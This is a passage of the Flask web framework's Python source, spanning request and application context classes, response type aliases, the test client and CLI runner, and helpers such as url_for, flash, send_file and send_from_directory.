) ctx = ctx.copy() def wrapper(*args: t.Any, **kwargs: t.Any) -> t.Any: with ctx: # type: ignore[union-attr] return ctx.app.ensure_sync(f)(*args, **kwargs) # type: ignore[union-attr] return update_wrapper(wrapper, f) # type: ignore[return-value] def has_request_context() -> bool: """If you have code that wants to test if a request context is there or not this function can be used. For instance, you may want to take advantage of request information if the request object is available, but fail silently if it is unavailable. :: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and has_request_context(): remote_addr = request.remote_addr self.remote_addr = remote_addr Alternatively you can also just test any of the context bound objects (such as :class:`request` or :class:`g`) for truthness:: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and request: remote_addr = request.remote_addr self.remote_addr = remote_addr .. versionadded:: 0.7 """ return _cv_request.get(None) is not None def has_app_context() -> bool: """Works like :func:`has_request_context` but for the application context. You can also just do a boolean check on the :data:`current_app` object instead. .. versionadded:: 0.9 """ return _cv_app.get(None) is not None class AppContext: """The app context contains application-specific information. An app context is created and pushed at the beginning of each request if one is not already active. An app context is also pushed when running CLI commands. """ def __init__(self, app: Flask) -> None: self.app = app self.url_adapter = app.create_url_adapter(None) self.g: _AppCtxGlobals = app.app_ctx_globals_class() self._cv_tokens: list[contextvars.Token[AppContext]] = [] def push(self) -> None: """Binds the app context to the current context.""" self._cv_tokens.append(_cv_app.set(self)) appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync) def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore """Pops the app context.""" try: if len(self._cv_tokens) == 1: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_appcontext(exc) finally: ctx = _cv_app.get() _cv_app.reset(self._cv_tokens.pop()) if ctx is not self: raise AssertionError( f"Popped wrong app context. ({ctx!r} instead of {self!r})" ) appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync) def __enter__(self) -> AppContext: self.push() return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.pop(exc_value) class RequestContext: """The request context contains per-request information. The Flask app creates and pushes it at the beginning of the request, then pops it at the end of the request. It will create the URL adapter and request object for the WSGI environment provided. Do not attempt to use this class directly, instead use :meth:`~flask.Flask.test_request_context` and :meth:`~flask.Flask.request_context` to create this object. When the request context is popped, it will evaluate all the functions registered on the application for teardown execution (:meth:`~flask.Flask.teardown_request`). The request context is automatically popped at the end of the request. When using the interactive debugger, the context will be restored so ``request`` is still accessible. Similarly, the test client can preserve the context after the request ends. 
However, teardown functions may already have closed some resources such as database connections. """ def __init__( self, app: Flask, environ: WSGIEnvironment, request: Request | None = None, session: SessionMixin | None = None, ) -> None: self.app = app if request is None: request = app.request_class(environ) request.json_module = app.json self.request: Request = request self.url_adapter = None try: self.url_adapter = app.create_url_adapter(self.request) except HTTPException as e: self.request.routing_exception = e self.flashes: list[tuple[str, str]] | None = None self.session: SessionMixin | None = session # Functions that should be executed after the request on the response # object. These will be called before the regular "after_request" # functions. self._after_request_functions: list[ft.AfterRequestCallable[t.Any]] = [] self._cv_tokens: list[ tuple[contextvars.Token[RequestContext], AppContext | None] ] = [] def copy(self) -> RequestContext: """Creates a copy of this request context with the same request object. This can be used to move a request context to a different greenlet. Because the actual request object is the same this cannot be used to move a request context to a different thread unless access to the request object is locked. .. versionadded:: 0.10 .. versionchanged:: 1.1 The current session object is used instead of reloading the original data. This prevents `flask.session` pointing to an out-of-date object. """ return self.__class__( self.app, environ=self.request.environ, request=self.request, session=self.session, ) def match_request(self) -> None: """Can be overridden by a subclass to hook into the matching of the request. """ try: result = self.url_adapter.match(return_rule=True) # type: ignore self.request.url_rule, self.request.view_args = result # type: ignore except HTTPException as e: self.request.routing_exception = e def push(self) -> None: # Before we push the request context we have to ensure that there # is an application context. app_ctx = _cv_app.get(None) if app_ctx is None or app_ctx.app is not self.app: app_ctx = self.app.app_context() app_ctx.push() else: app_ctx = None self._cv_tokens.append((_cv_request.set(self), app_ctx)) # Open the session at the moment that the request context is available. # This allows a custom open_session method to use the request context. # Only open a new session if this is the first time the request was # pushed, otherwise stream_with_context loses the session. if self.session is None: session_interface = self.app.session_interface self.session = session_interface.open_session(self.app, self.request) if self.session is None: self.session = session_interface.make_null_session(self.app) # Match the request URL after loading the session, so that the # session is available in custom URL converters. if self.url_adapter is not None: self.match_request() def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore """Pops the request context and unbinds it by doing that. This will also trigger the execution of functions registered by the :meth:`~flask.Flask.teardown_request` decorator. .. versionchanged:: 0.9 Added the `exc` argument. 
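
        For illustration, a manual push/pop that forwards an exception to
        the teardown functions (normally a ``with`` block or Flask itself
        handles this)::

            ctx = app.test_request_context("/")
            ctx.push()
            try:
                ...
            except Exception as exc:
                ctx.pop(exc)
                raise
            else:
                ctx.pop()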
""" clear_request = len(self._cv_tokens) == 1 try: if clear_request: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_request(exc) request_close = getattr(self.request, "close", None) if request_close is not None: request_close() finally: ctx = _cv_request.get() token, app_ctx = self._cv_tokens.pop() _cv_request.reset(token) # get rid of circular dependencies at the end of the request # so that we don't require the GC to be active. if clear_request: ctx.request.environ["werkzeug.request"] = None if app_ctx is not None: app_ctx.pop(exc) if ctx is not self: raise AssertionError( f"Popped wrong request context. ({ctx!r} instead of {self!r})" ) def __enter__(self) -> RequestContext: self.push() return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.pop(exc_value) def __repr__(self) -> str: return ( f"<{type(self).__name__} {self.request.url!r}" f" [{self.request.method}] of {self.app.name}>" ) File: src/flask/typing.py from __future__ import annotations import typing as t if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIApplication # noqa: F401 from werkzeug.datastructures import Headers # noqa: F401 from werkzeug.sansio.response import Response # noqa: F401 # The possible types that are directly convertible or are a Response object. ResponseValue = t.Union[ "Response", str, bytes, t.List[t.Any], # Only dict is actually accepted, but Mapping allows for TypedDict. t.Mapping[str, t.Any], t.Iterator[str], t.Iterator[bytes], ] # the possible types for an individual HTTP header # This should be a Union, but mypy doesn't pass unless it's a TypeVar. HeaderValue = t.Union[str, t.List[str], t.Tuple[str, ...]] # the possible types for HTTP headers HeadersValue = t.Union[ "Headers", t.Mapping[str, HeaderValue], t.Sequence[t.Tuple[str, HeaderValue]], ] # The possible types returned by a route function. ResponseReturnValue = t.Union[ ResponseValue, t.Tuple[ResponseValue, HeadersValue], t.Tuple[ResponseValue, int], t.Tuple[ResponseValue, int, HeadersValue], "WSGIApplication", ] # Allow any subclass of werkzeug.Response, such as the one from Flask, # as a callback argument. Using werkzeug.Response directly makes a # callback annotated with flask.Response fail type checking. 
ResponseClass = t.TypeVar("ResponseClass", bound="Response") AppOrBlueprintKey = t.Optional[str] # The App key is None, whereas blueprints are named AfterRequestCallable = t.Union[ t.Callable[[ResponseClass], ResponseClass], t.Callable[[ResponseClass], t.Awaitable[ResponseClass]], ] BeforeFirstRequestCallable = t.Union[ t.Callable[[], None], t.Callable[[], t.Awaitable[None]] ] BeforeRequestCallable = t.Union[ t.Callable[[], t.Optional[ResponseReturnValue]], t.Callable[[], t.Awaitable[t.Optional[ResponseReturnValue]]], ] ShellContextProcessorCallable = t.Callable[[], t.Dict[str, t.Any]] TeardownCallable = t.Union[ t.Callable[[t.Optional[BaseException]], None], t.Callable[[t.Optional[BaseException]], t.Awaitable[None]], ] TemplateContextProcessorCallable = t.Union[ t.Callable[[], t.Dict[str, t.Any]], t.Callable[[], t.Awaitable[t.Dict[str, t.Any]]], ] TemplateFilterCallable = t.Callable[..., t.Any] TemplateGlobalCallable = t.Callable[..., t.Any] TemplateTestCallable = t.Callable[..., bool] URLDefaultCallable = t.Callable[[str, t.Dict[str, t.Any]], None] URLValuePreprocessorCallable = t.Callable[ [t.Optional[str], t.Optional[t.Dict[str, t.Any]]], None ] # This should take Exception, but that either breaks typing the argument # with a specific exception, or decorating multiple times with different # exceptions (and using a union type on the argument). # https://github.com/pallets/flask/issues/4095 # https://github.com/pallets/flask/issues/4295 # https://github.com/pallets/flask/issues/4297 ErrorHandlerCallable = t.Union[ t.Callable[[t.Any], ResponseReturnValue], t.Callable[[t.Any], t.Awaitable[ResponseReturnValue]], ] RouteCallable = t.Union[ t.Callable[..., ResponseReturnValue], t.Callable[..., t.Awaitable[ResponseReturnValue]], ] File: src/flask/testing.py from __future__ import annotations import importlib.metadata import typing as t from contextlib import contextmanager from contextlib import ExitStack from copy import copy from types import TracebackType from urllib.parse import urlsplit import werkzeug.test from click.testing import CliRunner from werkzeug.test import Client from werkzeug.wrappers import Request as BaseRequest from .cli import ScriptInfo from .sessions import SessionMixin if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIEnvironment from werkzeug.test import TestResponse from .app import Flask class EnvironBuilder(werkzeug.test.EnvironBuilder): """An :class:`~werkzeug.test.EnvironBuilder`, that takes defaults from the application. :param app: The Flask application to configure the environment from. :param path: URL path being requested. :param base_url: Base URL where the app is being served, which ``path`` is relative to. If not given, built from :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. :param url_scheme: Scheme to use instead of :data:`PREFERRED_URL_SCHEME`. :param json: If given, this is serialized as JSON and passed as ``data``. Also defaults ``content_type`` to ``application/json``. :param args: other positional arguments passed to :class:`~werkzeug.test.EnvironBuilder`. :param kwargs: other keyword arguments passed to :class:`~werkzeug.test.EnvironBuilder`. 
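
    A minimal sketch of direct use (``app`` stands in for any Flask
    application; normally the test client builds this for you)::

        builder = EnvironBuilder(app, "/hello", json={"name": "World"})
        try:
            environ = builder.get_environ()
        finally:
            builder.close()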
""" def __init__( self, app: Flask, path: str = "/", base_url: str | None = None, subdomain: str | None = None, url_scheme: str | None = None, *args: t.Any, **kwargs: t.Any, ) -> None: assert not (base_url or subdomain or url_scheme) or ( base_url is not None ) != bool( subdomain or url_scheme ), 'Cannot pass "subdomain" or "url_scheme" with "base_url".' if base_url is None: http_host = app.config.get("SERVER_NAME") or "localhost" app_root = app.config["APPLICATION_ROOT"] if subdomain: http_host = f"{subdomain}.{http_host}" if url_scheme is None: url_scheme = app.config["PREFERRED_URL_SCHEME"] url = urlsplit(path) base_url = ( f"{url.scheme or url_scheme}://{url.netloc or http_host}" f"/{app_root.lstrip('/')}" ) path = url.path if url.query: sep = b"?" if isinstance(url.query, bytes) else "?" path += sep + url.query self.app = app super().__init__(path, base_url, *args, **kwargs) def json_dumps(self, obj: t.Any, **kwargs: t.Any) -> str: # type: ignore """Serialize ``obj`` to a JSON-formatted string. The serialization will be configured according to the config associated with this EnvironBuilder's ``app``. """ return self.app.json.dumps(obj, **kwargs) _werkzeug_version = "" def _get_werkzeug_version() -> str: global _werkzeug_version if not _werkzeug_version: _werkzeug_version = importlib.metadata.version("werkzeug") return _werkzeug_version class FlaskClient(Client): """Works like a regular Werkzeug test client but has knowledge about Flask's contexts to defer the cleanup of the request context until the end of a ``with`` block. For general information about how to use this class refer to :class:`werkzeug.test.Client`. .. versionchanged:: 0.12 `app.test_client()` includes preset default environment, which can be set after instantiation of the `app.test_client()` object in `client.environ_base`. Basic usage is outlined in the :doc:`/testing` chapter. """ application: Flask def __init__(self, *args: t.Any, **kwargs: t.Any) -> None: super().__init__(*args, **kwargs) self.preserve_context = False self._new_contexts: list[t.ContextManager[t.Any]] = [] self._context_stack = ExitStack() self.environ_base = { "REMOTE_ADDR": "127.0.0.1", "HTTP_USER_AGENT": f"Werkzeug/{_get_werkzeug_version()}", } @contextmanager def session_transaction( self, *args: t.Any, **kwargs: t.Any ) -> t.Iterator[SessionMixin]: """When used in combination with a ``with`` statement this opens a session transaction. This can be used to modify the session that the test client uses. Once the ``with`` block is left the session is stored back. :: with client.session_transaction() as session: session['value'] = 42 Internally this is implemented by going through a temporary test request context and since session handling could depend on request variables this function accepts the same arguments as :meth:`~flask.Flask.test_request_context` which are directly passed through. """ if self._cookies is None: raise TypeError( "Cookies are disabled. Create a client with 'use_cookies=True'." 
) app = self.application ctx = app.test_request_context(*args, **kwargs) self._add_cookies_to_wsgi(ctx.request.environ) with ctx: sess = app.session_interface.open_session(app, ctx.request) if sess is None: raise RuntimeError("Session backend did not open a session.") yield sess resp = app.response_class() if app.session_interface.is_null_session(sess): return with ctx: app.session_interface.save_session(app, sess, resp) self._update_cookies_from_response( ctx.request.host.partition(":")[0], ctx.request.path, resp.headers.getlist("Set-Cookie"), ) def _copy_environ(self, other: WSGIEnvironment) -> WSGIEnvironment: out = {**self.environ_base, **other} if self.preserve_context: out["werkzeug.debug.preserve_context"] = self._new_contexts.append return out def _request_from_builder_args( self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] ) -> BaseRequest: kwargs["environ_base"] = self._copy_environ(kwargs.get("environ_base", {})) builder = EnvironBuilder(self.application, *args, **kwargs) try: return builder.get_request() finally: builder.close() def open( self, *args: t.Any, buffered: bool = False, follow_redirects: bool = False, **kwargs: t.Any, ) -> TestResponse: if args and isinstance( args[0], (werkzeug.test.EnvironBuilder, dict, BaseRequest) ): if isinstance(args[0], werkzeug.test.EnvironBuilder): builder = copy(args[0]) builder.environ_base = self._copy_environ(builder.environ_base or {}) # type: ignore[arg-type] request = builder.get_request() elif isinstance(args[0], dict): request = EnvironBuilder.from_environ( args[0], app=self.application, environ_base=self._copy_environ({}) ).get_request() else: # isinstance(args[0], BaseRequest) request = copy(args[0]) request.environ = self._copy_environ(request.environ) else: # request is None request = self._request_from_builder_args(args, kwargs) # Pop any previously preserved contexts. This prevents contexts # from being preserved across redirects or multiple requests # within a single block. self._context_stack.close() response = super().open( request, buffered=buffered, follow_redirects=follow_redirects, ) response.json_module = self.application.json # type: ignore[assignment] # Re-push contexts that were preserved during the request. while self._new_contexts: cm = self._new_contexts.pop() self._context_stack.enter_context(cm) return response def __enter__(self) -> FlaskClient: if self.preserve_context: raise RuntimeError("Cannot nest client invocations") self.preserve_context = True return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.preserve_context = False self._context_stack.close() class FlaskCliRunner(CliRunner): """A :class:`~click.testing.CliRunner` for testing a Flask app's CLI commands. Typically created using :meth:`~flask.Flask.test_cli_runner`. See :ref:`testing-cli`. """ def __init__(self, app: Flask, **kwargs: t.Any) -> None: self.app = app super().__init__(**kwargs) def invoke( # type: ignore self, cli: t.Any = None, args: t.Any = None, **kwargs: t.Any ) -> t.Any: """Invokes a CLI command in an isolated environment. See :meth:`CliRunner.invoke <click.testing.CliRunner.invoke>` for full method documentation. See :ref:`testing-cli` for examples. If the ``obj`` argument is not given, passes an instance of :class:`~flask.cli.ScriptInfo` that knows how to load the Flask app being tested. :param cli: Command object to invoke. Default is the app's :attr:`~flask.app.Flask.cli` group. :param args: List of strings to invoke the command with. 
:return: a :class:`~click.testing.Result` object. """ if cli is None: cli = self.app.cli if "obj" not in kwargs: kwargs["obj"] = ScriptInfo(create_app=lambda: self.app) return super().invoke(cli, args, **kwargs) File: src/flask/helpers.py from __future__ import annotations import importlib.util import os import sys import typing as t from datetime import datetime from functools import lru_cache from functools import update_wrapper import werkzeug.utils from werkzeug.exceptions import abort as _wz_abort from werkzeug.utils import redirect as _wz_redirect from werkzeug.wrappers import Response as BaseResponse from .globals import _cv_request from .globals import current_app from .globals import request from .globals import request_ctx from .globals import session from .signals import message_flashed if t.TYPE_CHECKING: # pragma: no cover from .wrappers import Response def get_debug_flag() -> bool: """Get whether debug mode should be enabled for the app, indicated by the :envvar:`FLASK_DEBUG` environment variable. The default is ``False``. """ val = os.environ.get("FLASK_DEBUG") return bool(val and val.lower() not in {"0", "false", "no"}) def get_load_dotenv(default: bool = True) -> bool: """Get whether the user has disabled loading default dotenv files by setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load the files. :param default: What to return if the env var isn't set. """ val = os.environ.get("FLASK_SKIP_DOTENV") if not val: return default return val.lower() in ("0", "false", "no") @t.overload def stream_with_context( generator_or_function: t.Iterator[t.AnyStr], ) -> t.Iterator[t.AnyStr]: ... @t.overload def stream_with_context( generator_or_function: t.Callable[..., t.Iterator[t.AnyStr]], ) -> t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: ... def stream_with_context( generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]], ) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: """Request contexts disappear when the response is started on the server. This is done for efficiency reasons and to make it less likely to encounter memory leaks with badly written WSGI middlewares. The downside is that if you are using streamed responses, the generator cannot access request bound information any more. This function however can help you keep the context around for longer:: from flask import stream_with_context, request, Response @app.route('/stream') def streamed_response(): @stream_with_context def generate(): yield 'Hello ' yield request.args['name'] yield '!' return Response(generate()) Alternatively it can also be used around a specific generator:: from flask import stream_with_context, request, Response @app.route('/stream') def streamed_response(): def generate(): yield 'Hello ' yield request.args['name'] yield '!' return Response(stream_with_context(generate())) .. versionadded:: 0.9 """ try: gen = iter(generator_or_function) # type: ignore[arg-type] except TypeError: def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any: gen = generator_or_function(*args, **kwargs) # type: ignore[operator] return stream_with_context(gen) return update_wrapper(decorator, generator_or_function) # type: ignore[arg-type, return-value] def generator() -> t.Iterator[t.AnyStr | None]: ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'stream_with_context' can only be used when a request" " context is active, such as in a view function." ) with ctx: # Dummy sentinel. 
Has to be inside the context block or we're # not actually keeping the context around. yield None # The try/finally is here so that if someone passes a WSGI level # iterator in we're still running the cleanup logic. Generators # don't need that because they are closed on their destruction # automatically. try: yield from gen finally: if hasattr(gen, "close"): gen.close() # The trick is to start the generator. Then the code execution runs until # the first dummy None is yielded at which point the context was already # pushed. This item is discarded. Then when the iteration continues the # real generator is executed. wrapped_g = generator() next(wrapped_g) return wrapped_g # type: ignore[return-value] def make_response(*args: t.Any) -> Response: """Sometimes it is necessary to set additional headers in a view. Because views do not have to return response objects but can return a value that is converted into a response object by Flask itself, it becomes tricky to add headers to it. This function can be called instead of using a return and you will get a response object which you can use to attach headers. If view looked like this and you want to add a new header:: def index(): return render_template('index.html', foo=42) You can now do something like this:: def index(): response = make_response(render_template('index.html', foo=42)) response.headers['X-Parachutes'] = 'parachutes are cool' return response This function accepts the very same arguments you can return from a view function. This for example creates a response with a 404 error code:: response = make_response(render_template('not_found.html'), 404) The other use case of this function is to force the return value of a view function into a response which is helpful with view decorators:: response = make_response(view_function()) response.headers['X-Parachutes'] = 'parachutes are cool' Internally this function does the following things: - if no arguments are passed, it creates a new response argument - if one argument is passed, :meth:`flask.Flask.make_response` is invoked with it. - if more than one argument is passed, the arguments are passed to the :meth:`flask.Flask.make_response` function as tuple. .. versionadded:: 0.6 """ if not args: return current_app.response_class() if len(args) == 1: args = args[0] return current_app.make_response(args) def url_for( endpoint: str, *, _anchor: str | None = None, _method: str | None = None, _scheme: str | None = None, _external: bool | None = None, **values: t.Any, ) -> str: """Generate a URL to the given endpoint with the given values. This requires an active request or application context, and calls :meth:`current_app.url_for() <flask.Flask.url_for>`. See that method for full documentation. :param endpoint: The endpoint name associated with the URL to generate. If this starts with a ``.``, the current blueprint name (if any) will be used. :param _anchor: If given, append this as ``#anchor`` to the URL. :param _method: If given, generate the URL associated with this method for the endpoint. :param _scheme: If given, the URL will have this scheme if it is external. :param _external: If given, prefer the URL to be internal (False) or require it to be external (True). External URLs include the scheme and domain. When not in an active request, URLs are external by default. :param values: Values to use for the variable parts of the URL rule. Unknown keys are appended as query string arguments, like ``?a=b&c=d``. .. 
versionchanged:: 2.2 Calls ``current_app.url_for``, allowing an app to override the behavior. .. versionchanged:: 0.10 The ``_scheme`` parameter was added. .. versionchanged:: 0.9 The ``_anchor`` and ``_method`` parameters were added. .. versionchanged:: 0.9 Calls ``app.handle_url_build_error`` on build errors. """ return current_app.url_for( endpoint, _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external, **values, ) def redirect( location: str, code: int = 302, Response: type[BaseResponse] | None = None ) -> BaseResponse: """Create a redirect response object. If :data:`~flask.current_app` is available, it will use its :meth:`~flask.Flask.redirect` method, otherwise it will use :func:`werkzeug.utils.redirect`. :param location: The URL to redirect to. :param code: The status code for the redirect. :param Response: The response class to use. Not used when ``current_app`` is active, which uses ``app.response_class``. .. versionadded:: 2.2 Calls ``current_app.redirect`` if available instead of always using Werkzeug's default ``redirect``. """ if current_app: return current_app.redirect(location, code=code) return _wz_redirect(location, code=code, Response=Response) def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given status code. If :data:`~flask.current_app` is available, it will call its :attr:`~flask.Flask.aborter` object, otherwise it will use :func:`werkzeug.exceptions.abort`. :param code: The status code for the exception, which must be registered in ``app.aborter``. :param args: Passed to the exception. :param kwargs: Passed to the exception. .. versionadded:: 2.2 Calls ``current_app.aborter`` if available instead of always using Werkzeug's default ``abort``. """ if current_app: current_app.aborter(code, *args, **kwargs) _wz_abort(code, *args, **kwargs) def get_template_attribute(template_name: str, attribute: str) -> t.Any: """Loads a macro (or variable) a template exports. This can be used to invoke a macro from within Python code. If you for example have a template named :file:`_cider.html` with the following contents: .. sourcecode:: html+jinja {% macro hello(name) %}Hello {{ name }}!{% endmacro %} You can access this from Python code like this:: hello = get_template_attribute('_cider.html', 'hello') return hello('World') .. versionadded:: 0.2 :param template_name: the name of the template :param attribute: the name of the variable of macro to access """ return getattr(current_app.jinja_env.get_template(template_name).module, attribute) def flash(message: str, category: str = "message") -> None: """Flashes a message to the next request. In order to remove the flashed message from the session and to display it to the user, the template has to call :func:`get_flashed_messages`. .. versionchanged:: 0.3 `category` parameter added. :param message: the message to be flashed. :param category: the category for the message. The following values are recommended: ``'message'`` for any kind of message, ``'error'`` for errors, ``'info'`` for information messages and ``'warning'`` for warnings. However any kind of string can be used as category. """ # Original implementation: # # session.setdefault('_flashes', []).append((category, message)) # # This assumed that changes made to mutable structures in the session are # always in sync with the session object, which is not true for session # implementations that use external storage for keeping their keys/values. 
flashes = session.get("_flashes", []) flashes.append((category, message)) session["_flashes"] = flashes app = current_app._get_current_object() # type: ignore message_flashed.send( app, _async_wrapper=app.ensure_sync, message=message, category=category, ) def get_flashed_messages( with_categories: bool = False, category_filter: t.Iterable[str] = () ) -> list[str] | list[tuple[str, str]]: """Pulls all flashed messages from the session and returns them. Further calls in the same request to the function will return the same messages. By default just the messages are returned, but when `with_categories` is set to ``True``, the return value will be a list of tuples in the form ``(category, message)`` instead. Filter the flashed messages to one or more categories by providing those categories in `category_filter`. This allows rendering categories in separate html blocks. The `with_categories` and `category_filter` arguments are distinct: * `with_categories` controls whether categories are returned with message text (``True`` gives a tuple, where ``False`` gives just the message text). * `category_filter` filters the messages down to only those matching the provided categories. See :doc:`/patterns/flashing` for examples. .. versionchanged:: 0.3 `with_categories` parameter added. .. versionchanged:: 0.9 `category_filter` parameter added. :param with_categories: set to ``True`` to also receive categories. :param category_filter: filter of categories to limit return values. Only categories in the list will be returned. """ flashes = request_ctx.flashes if flashes is None: flashes = session.pop("_flashes") if "_flashes" in session else [] request_ctx.flashes = flashes if category_filter: flashes = list(filter(lambda f: f[0] in category_filter, flashes)) if not with_categories: return [x[1] for x in flashes] return flashes def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]: if kwargs.get("max_age") is None: kwargs["max_age"] = current_app.get_send_file_max_age kwargs.update( environ=request.environ, use_x_sendfile=current_app.config["USE_X_SENDFILE"], response_class=current_app.response_class, _root_path=current_app.root_path, # type: ignore ) return kwargs def send_file( path_or_file: os.PathLike[t.AnyStr] | str | t.BinaryIO, mimetype: str | None = None, as_attachment: bool = False, download_name: str | None = None, conditional: bool = True, etag: bool | str = True, last_modified: datetime | int | float | None = None, max_age: None | (int | t.Callable[[str | None], int | None]) = None, ) -> Response: """Send the contents of a file to the client. The first argument can be a file path or a file-like object. Paths are preferred in most cases because Werkzeug can manage the file and get extra information from the path. Passing a file-like object requires that the file is opened in binary mode, and is mostly useful when building a file in memory with :class:`io.BytesIO`. Never pass file paths provided by a user. The path is assumed to be trusted, so a user could craft a path to access a file you didn't intend. Use :func:`send_from_directory` to safely serve user-requested paths from within a directory. If the WSGI server sets a ``file_wrapper`` in ``environ``, it is used, otherwise Werkzeug's built-in wrapper is used. Alternatively, if the HTTP server supports ``X-Sendfile``, configuring Flask with ``USE_X_SENDFILE = True`` will tell the server to send the given path, which is much more efficient than reading it in Python. 
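
    A small illustrative sketch (the route and file name are hypothetical)::

        from io import BytesIO

        @app.route("/report.txt")
        def report():
            data = BytesIO(b"hello, world")
            return send_file(data, mimetype="text/plain",
                             download_name="report.txt")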
:param path_or_file: The path to the file to send, relative to the current working directory if a relative path is given. Alternatively, a file-like object opened in binary mode. Make sure the file pointer is seeked to the start of the data. :param mimetype: The MIME type to send for the file. If not provided, it will try to detect it from the file name. :param as_attachment: Indicate to a browser that it should offer to save the file instead of displaying it. :param download_name: The default name browsers will use when saving the file. Defaults to the passed file name. :param conditional: Enable conditional and range responses based on request headers. Requires passing a file path and ``environ``. :param etag: Calculate an ETag for the file, which requires passing a file path. Can also be a string to use instead. :param last_modified: The last modified time to send for the file, in seconds. If not provided, it will try to detect it from the file path. :param max_age: How long the client should cache the file, in seconds. If set, ``Cache-Control`` will be ``public``, otherwise it will be ``no-cache`` to prefer conditional caching. .. versionchanged:: 2.0 ``download_name`` replaces the ``attachment_filename`` parameter. If ``as_attachment=False``, it is passed with ``Content-Disposition: inline`` instead. .. versionchanged:: 2.0 ``max_age`` replaces the ``cache_timeout`` parameter. ``conditional`` is enabled and ``max_age`` is not set by default. .. versionchanged:: 2.0 ``etag`` replaces the ``add_etags`` parameter. It can be a string to use instead of generating one. .. versionchanged:: 2.0 Passing a file-like object that inherits from :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather than sending an empty file. .. versionadded:: 2.0 Moved the implementation to Werkzeug. This is now a wrapper to pass some Flask-specific arguments. .. versionchanged:: 1.1 ``filename`` may be a :class:`~os.PathLike` object. .. versionchanged:: 1.1 Passing a :class:`~io.BytesIO` object supports range requests. .. versionchanged:: 1.0.3 Filenames are encoded with ASCII instead of Latin-1 for broader compatibility with WSGI servers. .. versionchanged:: 1.0 UTF-8 filenames as specified in :rfc:`2231` are supported. .. versionchanged:: 0.12 The filename is no longer automatically inferred from file objects. If you want to use automatic MIME and etag support, pass a filename via ``filename_or_fp`` or ``attachment_filename``. .. versionchanged:: 0.12 ``attachment_filename`` is preferred over ``filename`` for MIME detection. .. versionchanged:: 0.9 ``cache_timeout`` defaults to :meth:`Flask.get_send_file_max_age`. .. versionchanged:: 0.7 MIME guessing and etag support for file-like objects was removed because it was unreliable. Pass a filename if you are able to, otherwise attach an etag yourself. .. versionchanged:: 0.5 The ``add_etags``, ``cache_timeout`` and ``conditional`` parameters were added. The default behavior is to add etags. .. versionadded:: 0.2 """ return werkzeug.utils.send_file( # type: ignore[return-value] **_prepare_send_file_kwargs( path_or_file=path_or_file, environ=request.environ, mimetype=mimetype, as_attachment=as_attachment, download_name=download_name, conditional=conditional, etag=etag, last_modified=last_modified, max_age=max_age, ) ) def send_from_directory( directory: os.PathLike[str] | str, path: os.PathLike[str] | str, **kwargs: t.Any, ) -> Response: """Send a file from within a directory using :func:`send_file`. .. 
code-block:: python @app.route("/uploads/<path:name>") def download_file(name): return send_from_directory( app.config['UPLOAD_FOLDER'], name, as_attachment=True ) This is a secure way to serve files from a folder, such as static files or uploads. Uses :func:`~werkzeug.security.safe_join` to ensure the path coming from the client is not maliciously crafted to point outside the specified directory. If the final path does not point to an existing regular file, raises a 404 :exc:`~werkzeug.exceptions.NotFound` error. :param directory: The directory that ``path`` must be located under, relative to the current application's root path. :param path: The path to the file to send, relative to ``directory``. :param kwargs: Arguments to pass to :func:`send_file`. .. versionchanged:: 2.0 ``path`` replaces the ``filename`` parameter. .. versionadded:: 2.0 Moved the implementation to Werkzeug. This is now a wrapper to pass some Flask-specific arguments. .. versionadded:: 0.5 """ return werkzeug.utils.send_from_directory( # type: ignore[return-value] directory, path, **_prepare_send_file_kwargs(**kwargs) ) def get_root_path(import_name: str) -> str: """Find the root path of a package, or the path that contains a module. If it cannot be found, returns the current working directory. Not to be confused with the value returned by :func:`find_package`. :meta private: """ # Module already imported and has a file attribute. Use that first. mod = sys.modules.get(import_name) if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None: return os.path.dirname(os.path.abspath(mod.__file__)) # Next attempt: check the loader. try: spec = importlib.util.find_spec(import_name) if spec is None: raise ValueError except (ImportError, ValueError): loader = None else: loader = spec.loader # Loader does not exist or we're referring to an unloaded main # module or a main module without path (interactive sessions), go # with the current working directory. if loader is None: return os.getcwd() if hasattr(loader, "get_filename"): filepath = loader.get_filename(import_name) else: # Fall back to imports. __import__(import_name) mod = sys.modules[import_name] filepath = getattr(mod, "__file__", None) # If we don't have a file path it might be because it is a # namespace package. In this case pick the root path from the # first module that is contained in the package. if filepath is None: raise RuntimeError( "No root path can be found for the provided module" f" {import_name!r}. This can happen because the module" " came from an import hook that does not provide file" " name information or because it's a namespace package." " In this case the root path needs to be explicitly" " provided." ) # filepath is import_name.py for a module, or __init__.py for a package. return os.path.dirname(os.path.abspath(filepath)) # type: ignore[no-any-return] @lru_cache(maxsize=None) def _split_blueprint_path(name: str) -> list[str]: out: list[str] = [name] if "." in name: out.extend(_split_blueprint_path(name.rpartition(".")[0])) return out File: src/flask/__main__.py from .cli import main main() File: src/flask/views.py from 